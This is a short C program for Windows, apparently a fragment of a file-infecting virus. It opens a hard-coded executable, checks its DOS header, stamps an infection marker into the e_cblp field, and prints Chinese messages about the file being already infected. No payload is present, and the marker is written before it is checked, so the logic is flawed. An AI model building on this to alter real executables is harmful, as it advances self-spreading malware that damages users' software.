#include <stdio.h> #include <stddef.h> #include <windows.h> #define VIRUSFLAGS 0xCCCC
BOOL WriteSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile) { DWORD dwNum = 0; SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN); WriteFile(hFile, &dwSig, sizeof(DWORD), &dwNum, NULL); return TRUE; }
BOOL CheckSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile) { DWORD dwSigNum = 0; DWORD dwNum = 0; SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN); ReadFile(hFile, &dwSigNum, sizeof(DWORD), &dwNum, NULL);
if (dwSigNum == dwSig) return TRUE; return FALSE; }
int main(int argc, char* argv[]) { HANDLE hFile,hMap = NULL; LPVOID lpBase = NULL;
hFile = CreateFile("c://1.exe",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); hMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,0); lpBase = MapViewOfFile(hMap,FILE_MAP_READ | FILE_MAP_WRITE,0,0,0);
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase; PIMAGE_NT_HEADERS pNtHeader = NULL; PIMAGE_SECTION_HEADER pSec = NULL; IMAGE_SECTION_HEADER imgSec = { 0 };
if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { printf("文件非可执行文件 \n"); return -1; } pNtHeader = (PIMAGE_NT_HEADERS)((BYTE*)lpBase + pDosHeader->e_lfanew); WriteSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile);
if (CheckSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile)) { printf("文件已被感染,无法重复感染. \n"); }
system("pause"); return 0; }
|